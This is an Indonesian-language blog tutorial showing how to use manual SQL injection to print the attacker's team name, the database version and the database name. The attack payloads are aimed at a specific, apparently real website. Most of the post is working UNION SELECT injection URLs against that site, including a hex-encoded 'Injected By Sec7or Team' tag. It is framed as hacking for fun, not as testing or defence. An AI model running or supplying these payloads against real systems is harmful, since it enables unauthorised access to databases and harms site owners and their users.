Kamis, 30 Juli 2015

Cara Menampilkan Nama Kita, Versi, Dan Database Pada SQLi Manual


Cara Menampilkan Nama Kita, Versi, Dan Database Pada  SQLi Manual 
-  Baiklah :v kali ini saya mau membagikan Cara Menampilkan Nama Kita, Versi, Dan Database Pada  SQLi Manual yups masih banyak yang belum tau bagaimana caranya :v langsung saja kita cari target :D

Oke setelah terinject dan muncul magic number contohnya seperti ini :

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,3,4,5--+

Seperti yang kita ketahui disitu muncul magic number angka 3 untuk menampilkan nama kita, kita bisa menggunakan concat 
Oke kita contohkan saya ingin menampilkan "Injected By Sec7or Team"

Query akan menjadi seperti ini

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(Injected By Sec7or Team),4,5--+

Tapi itu belum selesai yang harus kita lakukan selanjutnya adalah menkonvert 
"Injected By Sec7or Team" menggunakan hex bisa menggunakan tools yang udah kesebar di gugel atau bisa langsung menggunakan hackbar
download di sini
Pada hackbar ini ada otomatis konvert unhex buatan root-kajj jadi pada saat setekah konvert tidak perlu lagi menambah 0x pada depan hasil konvertan jadi query nya adalah

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d),4,5--+



Baiklah untuk menambah pemanis kita juga print versi dan database nya
query akan menjadi seperti ini

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d,version(),database()),4,5--+

Tampilan di atas masih acak acak kalian bisa menambahkan sendiri spasi atau mempermanis dengan menambah tag html :*

Tambahan :

user() : menampilkan user
version() : menampilkan versi
database() : menampilan database

Jika masih ada yang ingin ditanyakan silahkan tanyakan pada komentar :v
Happy suntik menyuntik ;v
Load disqus comments

0 komentar

Comments
0 Comments